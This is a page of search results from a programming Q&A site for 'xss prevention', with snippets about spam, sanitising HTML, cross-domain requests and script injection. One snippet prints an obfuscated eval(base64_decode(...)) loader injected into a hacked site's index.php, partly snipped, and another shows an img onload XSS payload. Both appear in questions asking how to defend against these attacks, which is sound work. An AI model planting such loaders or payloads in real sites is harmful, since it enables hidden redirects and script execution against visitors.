Search Results

Search found 497 results on 20 pages for 'xss prevention'.

Page 6/20 | < Previous Page | 2 3 4 5 6 7 8 9 10 11 12 13  | Next Page >

  • Designing rules to fight smallpox in Civ-style TBS games

    - by Williham Totland
    TL;DR: How do you design a ruleset for a Civ-style TBS game that prevents city smallpox from being a profitable or viable strategy? Long version: Civ-style games are pretty great. Bringing a civilization from cradle to grave is a great endeavor, and practicing diplomacy with hard-line human players is fun and challenging. In theory. In practice, however, many of these games has, especially in multiplayer, exactly one viable strategy: City smallpox, a.k.a. infinite city spread, a.k.a. covering all available space with 1-citizen cities, packed as tight as they will go. I suppose this could count as emergent gameplay, but still; it could hardly be considered to be in the spirit of the class of game. The Civilization series, of course, is stuck in their more or less fixed rule sets, established with Civilization. Yes, there have been major changes in some respects, but the rules pertaining to city building and maintenance have stayed pretty similar. So the question, then: If you build a ruleset for a TBS from the ground up; what rules should be in place to prevent Infinite City Sprawl from being a viable strategy? Or should ICS be a viable strategy?

    Read the article

  • Is it possible to block traffic originating from a specific country?

    - by mickburkejnr
    Hi guys, My personal website is currently getting a lot of spam comments at the moment, and most of them originate from Russia (I've used Google Analytics to identify the traffic, and a lot of the links link to Russian sites). As it's a pain to keep deleting this comments, I would like to ban people from there commenting or visiting the website. Is this possible? Also, the website is using WordPress. Many thanks!

    Read the article

  • How to batch remove spamming users and pages they created on MediaWiki?

    - by Problemania
    I'm trying to clean up a MediaWiki instance which has been subjected to spamming and vandalism for a period of time. The current status is that there are a large number of users which only created spam pages but typically not altered legitimate pages. And there is only < 10 users which I know are legitimate users and created a small number of legitimate pages. Abstractly, my idea of fixing the messy situation is to find the complete list of users that are not in that small set of legitimate users, and use RenameUser extension to rename them all to a Spammer user, and use Nuke extension to mass delete all pages it created. Any practical advice on how to proceed? Since there are hundreds of spammer users, how do I effectively rename them? It seems Renameuser extension does not support automated batch renaming of users by allowing users to be renamed with a list or file.

    Read the article

  • Why do spammers use CELESTRON NEXTAR 6SE?

    - by fmz
    I am running a website for a volunteer organization that hosts an annual event. There is a form where people can volunteer to bring items for the event. All too frequently I get spam from users across the globe that enter things like this: Country - 1: Australia Material - 1: CELESTRON NEXTAR 6SE Country - 2: Australia Material - 2: C8 Newton Country - 3: Australia Material - 3: ETX 125EC Country - 4: Australia Material - 4: ETX 125EC Country - 5: Australia Material - 5: CELESTRON NEXTAR 6SE I don't really care about the country, but what is it with the telescope stuff? Is there some hidden meaning behind all this or is it some astronomy group that moonlights as spammers?

    Read the article

  • How to allow my Asp.net MVC 3 web app using MathJax to accept user input $x<y>z$ ?

    - by Recycle Bin
    I am developing a mathematics site using Asp.Net MVC 3 + Razor + MathJax. MathJax is a javascript library to render TeX or LaTeX codes on the web browser. And TeX or LaTeX codes represent mathematics contents such as an inline math $y=mx+c$ and a displayed math \[y=mx+c\]. Right now my site can accept input, for example, $x<y$. However it cannot accept $x<y>z$ because the framework regards this input is vulnerable to XSS and XSRF. Shortly speaking, what I should do to accomplish what I want but it does not open security vulnerability.

    Read the article

  • Are these two functions overkill for sanitization?

    - by jpjp
    function sanitizeString($var) { $var = stripslashes($var); $var = htmlentities($var); $var = strip_tags($var); return $var; } function sanitizeMySQL($var) { $var = mysql_real_escape_string($var); $var = sanitizeString($var); return $var; } I got these two functions from a book and the author says that by using these two, I can be extra safe against XSS(the first function) and sql injections(2nd func). Are all those necessary? Also for sanitizing, I use prepared statements to prevent sql injections. I would use it like this: $variable = sanitizeString($_POST['user_input']); $variable = sanitizeMySQL($_POST['user_input']);

    Read the article

  • Best practice. Do I save html tags in DB or store the html entity value?

    - by Matt
    Hi Guys, I was wondering about which way i should do the following. I am using the tiny MCE wysiwyg editor which formats the users data with the right html tags. Now, i need to save this data entered into the editor into a database table. Should I encode the html tags to their corresponding entities when inserting into the DB, then when i get the data back from the table, not have the encode it for XSS purposes but I'd still have to use eval for the html tags to format the text. OR Do i save the html tags into the database, then when i get the data back from the database encode the html tags to their entities, but then as the tags will appear to the user, I'd have to use the eval function to actually format the data as it was entered. My thoughts are with the first option, I just wondered on what you guys thought.

    Read the article

  • PHP: best practice. Do i save html tags in DB or store the html entity value?

    - by Matt
    Hi Guys, I was wondering about which way i should do the following. I am using the tiny MCE wysiwyg editor which formats the users data with the right html tags. Now, i need to save this data entered into the editor into a database table. Should i encode the html tags to their corresponding entities when inserting into the DB, then when i get the data back from the table, not have the encode it for XSS purposes but i'd still have to use eval for the html tags to format the text. OR Do i save the html tags into the database, then when i get the data back from the database encode the html tags to their entities, but then as the tags will appear to the user, i'd have to use the eval function to actually format the data as it was entered. My thoughts are with the first option, i just wondered on what you guys thought. Thanks M

    Read the article

  • Duplicate ID/indexes and looping

    - by Justin Alexander
    I realize having two elements in the same html doc with the same ID is wrong, bad, immoral, and will lead to global warming. But... I'm trying to write an XSS widgit, so I really have no control over the quality of the parent web page. I loop through document.images to retrieve a list of images on the page. I perform an action on each one. for(img in document.images){ ... } i've also tried for(var i=0;i<document.images.length;i++){ ... } in both cases it allows me to loop through all of the elements, BUT when trying trying to reference an object with a duplicate ID, I always get the first (in order of the html). When using debugger in IE8 i'm able to see that both elements ARE listed, but that they both have the same index (in IE the index of the document.images is either sequential or matches the image ID) Does anyone have a better solution?

    Read the article

  • Using user editable image URL in application. Security issues.

    - by sharas
    Hi there. I am writing an application where users are required to show their photo, however as my server resources are very limited I can not let them upload it to the server. So I have three major questions: 1. How to properly validate photo URL? At least I can validate with regexp, however I need to check for file ending: `validates_format_of :photo_url, :with => URI::regexp(%w(http https))` 2. Security issues? XSS? Even I validate the picture at the moment of creation, hacker can replace image with malicious stuff anytime. 3. Maybe there are free asset stores with API?

    Read the article

  • PHP: I got hacked...

    - by jun
    I just checked my site it suddenly jumps me to this site: xxxp://www1.re*******3.net/?p=p52dcWpkbG6HjsbIo216h3de0KCfaFbVoKDb2YmHWJjOxaCbkXp%2FWqyopHaYXsiaY2eRaGNpnFPVpJHaotahiaJ0WKrO1c%2Beb1qfnaSZdV%2FXlsndblaWpG9plmGQYWCcW5eakWppWKjKx6ChpqipbmdjpKjEjtDOoKOhY56n1pLWn1%2FZodXN02BdpqmikpVwZWpxZGxpcV%2FVoJajYmJkZ2hwlGGXaVbJkKC0q1eum5qimZxx I found out that in the first line of my index.php file, that looks like this: <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHR/* Snip */DkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBmdW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ=="));?> How do I stop this? thanks! UPDATE: What kind of attack is this? is this really xss? No one really knows about my ftp password.

    Read the article

  • Security as a Service (SecaaS) for Amazon EC2

    - by Dave
    I'm looking for a security as a service (SecaaS) provider or open source solution for Amazon EC2 instances, however I can't seem to find much on Google or elsewhere so was wondering if anyone knows where I could find this service? Ideally I'm looking for something that offers virtual firewalls, email and web security and virtual spam prevention. If anyone has any information on SecaaS i'd appreciate it, Thanks in advance

    Read the article

  • How to reliably send a request cross domain and cross browser on page unload

    - by Agmin
    I have javascript code that's loaded by 3rd parties. The javascript keeps track of a number of metrics, and when a user exits the page I'd like to send the metrics back to my server. Due to XSS checks in some browsers, like IE, I cannot do a simple jquery.ajax() call. Instead, I'm appending an image src to the page with jquery. Here's the code, cased by browser: function record_metrics() { //Arbitrary code execution here to set test_url $esajquery('#MainDiv').append("<img src='" + test_url + "' />"); } if ($esajquery.browser.msie) { window.onbeforeunload = function() { record_metrics(); } } else { $esajquery(window).unload( function(){ record_metrics(); } ); } FF aborts the request to "test_url" if I use window.onbeforeunload, and IE8 doesn't work with jquery's unload(). IE8 also fails to work if the arbitrary test_url setting code is too long, although IE8 seems to work fine if the is immediately appended to the DOM. Is there a better way to solve this issue? Unfortunately this really needs to execute when a user leaves the page.

    Read the article

  • Approaches for cross server content sharing?

    - by Anonymity
    I've currently been tasked with finding a best solution to serving up content on our new site from another one of our other sites. Several approaches suggested to me, that I've looked into include using SharePoint's Lists Web Service to grab the list through javascript - which results in XSS and is not an option. Another suggestion was to build a server side custom web service and use SharePoint Request Forms to get the information - this is something I've only very briefly looked at. It's been suggested that I try permitting the requesting site in the HTTP headers of the serving site since I have access to both. This ultimately resulted in a semi-working solution that had major security holes. (I had to include username/password in the request to appease AD Authentication). This was done by allowing Access-Control-Allow-Origin: * The most direct approach I could think of was to simply build in the webpart in our new environment to have the authors manually update this content the same as they would on the other site. Are any one of the suggestions here more valid than another? Which would be the best approach? Are there other suggestions I may be overlooking? I'm also not sure if WebCrawling or Content Scrapping really holds water here...

    Read the article

  • Sanitizing user input before adding it to the DOM in Javascript

    - by I GIVE TERRIBLE ADVICE
    I'm writing the JS for a chat application I'm working on in my free time, and I need to have HTML identifiers that change according to user submitted data. This is usually something conceptually shaky enough that I would not even attempt it, but I don't see myself having much of a choice this time. What I need to do then is to escape the HTML id to make sure it won't allow for XSS or breaking HTML. Here's the code: var user_id = escape(id) var txt = '<div class="chut">'+ '<div class="log" id="chut_'+user_id+'"></div>'+ '<textarea id="chut_'+user_id+'_msg"></textarea>'+ '<label for="chut_'+user_id+'_to">To:</label>'+ '<input type="text" id="chut_'+user_id+'_to" value='+user_id+' readonly="readonly" />'+ '<input type="submit" id="chut_'+user_id+'_send" value="Message"/>'+ '</div>'; What would be the best way to escape id to avoid any kind of problem mentioned above? As you can see, right now I'm using the built-in escape() function, but I'm not sure of how good this is supposed to be compared to other alternatives. I'm mostly used to sanitizing input before it goes in a text node, not an id itself.

    Read the article

  • Sanitizing usser input before adding it to the DOM in Javascript

    - by I GIVE TERRIBLE ADVICE
    I'm writing the JS for a chat appication I'm working on in my free time, and I need to have HTML identifiers that change according to user submitted data. This is usually something conceptually shaky enough that I would not even attempt it, but I don't see myself having much of a choice this time. What I need to do then is to escape the HTML id to make sure it won't allow for XSS or breaking HTML. Here's the code: var user_id = escape(id) var txt = '<div class="chut">'+ '<div class="log" id="chut_'+user_id+'"></div>'+ '<textarea id="chut_'+user_id+'_msg"></textarea>'+ '<label for="chut_'+user_id+'_to">To:</label>'+ '<input type="text" id="chut_'+user_id+'_to" value='+user_id+' readonly="readonly" />'+ '<input type="submit" id="chut_'+user_id+'_send" value="Message"/>'+ '</div>'; What would be the best way to escape id to avoid any kind of problem mentioned above? As you can see, right now I'm using the built-in escape() function, but I'm not sure of how good this is supposed to be compared to other alternatives. I'm mostly used to sanitizing input before it goes in a text node, not an id itself.

    Read the article

  • how to better (inambiguaously) use the terms CAPTCHA and various types of interactions?

    - by vgv8
    I am working on survey of state-of-the-art and trends of spam prevention techniques. I observe that non-intrusive, transparent to visitor spam prevention techniques (like context-based filtering or honey traps) are frequently called non-captcha. Is it correct understanding of term CAPTCHA which is "type of challenge-response [ 2 ]test used in computing to ensure that the response is not generated by a compute" [ 1 ] and challenge-response does not seem to imply obligatory human involvement. So, which understanding (definition) of term and classification I'd better to stick with? How would I better call CAPTCHA without direct human interaction in order to avoid ambiguity and confusion of terms understnding? How would I better (succinctly and unambiguously) coin the term for captchas requiring human interaction but without typing into textbox? How would I better (succinctly and unambiguously) coin the terms to mark the difference between human interaction with images (playing, drag&dropping, rearranging, clicking with images) vs. just recognizing them (and then typing into a textbox the answer without interaction with images)? PS. The problem is that recognition of a wiggled word in an image or typing the answer to question is also interaction and when I start to use the terms "interaction", "interactive", "captcha", "protection", "non-captcha", "non-interactive", "static", "dynamic", "visible", "hidden" the terms overlap ambiguously with which another (especailly because the definitions or their actual practice of usage are vague or contradictive). [ 1 ] http://en.wikipedia.org/wiki/CAPTCHA

    Read the article

  • use jsonp to get xml cross domain

    - by lmkk
    I am trying to read xml into a webpage from another server, and I assume that my problem is Same-Origin Policy, and therefore a cross domain problem. I have a bit of googling and it seems that jsonp is the way forward. Based on some examples I found here on stackoverflow and another sites, this is what I have, and it does not "hit" the server with the xml. I can view the xml in a browser. $(document).ready(function(){ $.ajax({ type: 'GET', dataType: 'jsonp', url: 'http://192.168.0.106:8111/getconfiguration?', success: function (xml) { //do stuff with received xml }}); Any suggestions? please keep in mind that I am a newbie with regards to JS / JQuery ;o)

    Read the article

  • How to Force a Method Call on a Property or Method of an Object in PHP?

    - by Noah Goodrich
    In my View (using Zend_View so the the view is an object), I make calls to object properties and methods to populate the template like so: <?= $this->user->name ?> // Outputs John Doe <br/> <?= $this->user->getCompany()->name ?> // Outputs Acme <br/> <?= $this->method() ?> // Outputs foobar If I make it so that all property requests (like for 'user') go through __get() is there any way that I can catch the subsequent calls so that I can force a method call on the final outputted value? For example so that I could do automatic escaping of output. As I see it right now, I either have to escape the input as it goes into the database or use compiled templates like Smarty does, or switch to assigning every variable to the View object so that it has direct control to force escaping before outputting the data.

    Read the article

  • How does Google Friend Connect accomplish cross domain communication without needing to upload a file to the client domain?

    - by mboyle
    Previously, Google's Friend Connect required users to upload a couple of files to their websites to enable cross domain communication and Facebook Connect still requires you to upload a single file to enabled it. Now, Friend Connect doesn't require any file upload... I was wondering how they were able to accomplish this. Reference: http://www.techcrunch.com/2009/10/02/easy-does-it-google-friend-connect-one-ups-facebook-connects-install-wizard/

    Read the article

  • Vote on Pros and Cons of Java HTML to XML cleaners

    - by George Bailey
    I am looking to allow HTML emails (and other HTML uploads) without letting in scripts and stuff. I plan to have a white list of safe tags and attributes as well as a whitelist of CSS tags and value regexes (to prevent automatic return receipt). I asked a question: Parse a badly formatted XML document (like an HTML file) I found there are many many ways to do this. Some systems have built in sanitizers (which I don't care so much about). This page is a very nice listing page but I get kinda lost http://java-source.net/open-source/html-parsers It is very important that the parsers never throw an exception. There should always be best guess results to the parse/clean. It is also very important that the result is valid XML that can be traversed in Java. I posted some product information and said Community Wiki. Please post any other product suggestions you like and say Community Wiki so they can be voted on. Also any comments or wiki edits on what part of a certain product is better and what is not would be greatly appreciated. (for example,, speed vs accuracy..) It seems that we will go with either jsoup (seems more active and up to date) or TagSoup (compatible with JDK4 and been around awhile). A +1 for any of these products would be if they could convert all style sheets into inline style on the elements.

    Read the article

  • Best Practice: Legitimate Cross-Site Scripting

    - by Ryan
    While cross-site scripting is generally regarded as negative, I've run into several situations where it's necessary. I was recently working within the confines of a very limiting content management system. I needed to include database code within the page, but the hosting server didn't have anything usable available. I set up a couple barebones scripts on my own server, originally thinking that I could use AJAX to import the contents of my scripts directly into the template of the CMS (thus retaining dynamic images, menu items, CSS, etc.). I was wrong. Due to the limitations of XMLHttpRequest objects, it's not possible to grab content from a different domain. So I thought "iFrame" - even though I'm not a fan of frames, I thought that I could create a frame that matched the width and height of the content, so that it would appear native. Again, I was blocked by cross-site scripting "protections." While I could indeed load a remote file into the iFrame, I couldn't execute JavaScript to modify its size on either the host page or inside the loaded page. In this particular scenario, I wasn't able to point a subdomain to my server. I also couldn't create a script on the CMS server that could proxy content from my server, so my last thought was to use a remote JavaScript. A remote JavaScript works. It breaks when the user has JavaScript disabled, which is a downside; but it works. The "problem" I was having with using a remote JavaScript was that I had to use the JS function document.write() to output any content. Any output that isn't JS causes script errors. In addition to using document.write() for every line, you also have to ensure that the content is escaped - or else you end up with more script errors. My solution was as follows: My script received a GET parameter ("page") and then looked for the file ({$page}.php), and read the contents into a variable. However, I had to use awkward buffering techniques in order to actually execute the included scripts (for things like database interaction) then strip the final content of all line break characters ("\n") followed by escaping all required characters. The end result is that my original script (which outputs JavaScript) accesses seemingly "standard" scripts on my server and converts their standard output to JavaScript for displaying within the CMS template. While this solution works, it seems like there may be a better way to accomplish the same thing. What is the best way to make cross-site scripting work specifically for the purpose of including content from a completely different domain?

    Read the article

  • Cleaning all inline events from HTML tags

    - by Itay Moav
    For HTML input, I want to neutralize all HTML elements that have inline js (onclick="..", onmouseout=".." etc). I am thinking, isn't it enough to encode the following chars? =,(,) So onclick="location.href='ggg.com'" will become onclick%3D"location.href%3D'ggg.com'" What am I missing here? Edit: I do need to accept active HTML (I can't escape it all or entities is it).

    Read the article

  • PHP Form Security With Referer

    - by Jascha
    I'm putting together a site that will make itself available for user input. I was wondering if writing a function like: if(getenv("HTTP_REFERER") != 'http://www.myURL.com/submitArea'){ die('don\'t be an jerk, ruin your own site'); }else{ // continue with form processing } is enough to prevent cross site form submissions.

    Read the article

  • prevent javascript in the WMD editor's preview box

    - by Justin Grant
    There are many SO questions (e.g. here and here) about how to do server-side scrubbing of Markdown produced by the WMD editor to ensure the HTML generated doesn't contain malicious script, like this: <img onload="alert('haha');" src="http://www.google.com/intl/en_ALL/images/srpr/logo1w.png" /> Unfortunately, this still allows script to show up in the WMD client's preview box. I doubt this is a big deal since if you're scrubbing the HTML on the server, an attacker can't save the bad HTML so no one else will be able to see it later and have their cookies stolen or sessions hijacked by the bad script. But it's still kinda odd to allow an attacker to run any script in the context of your site, and it's probably a bad idea to allow the client preview window to allow different HTML than your server will allow. StackOverflow has clearly plugged this hole. How did they do it? [NOTE: I already figured this out but it required some tricky javascript debugging, so I'm answering my own question here to help others who may want to do ths same thing]

    Read the article

< Previous Page | 2 3 4 5 6 7 8 9 10 11 12 13  | Next Page >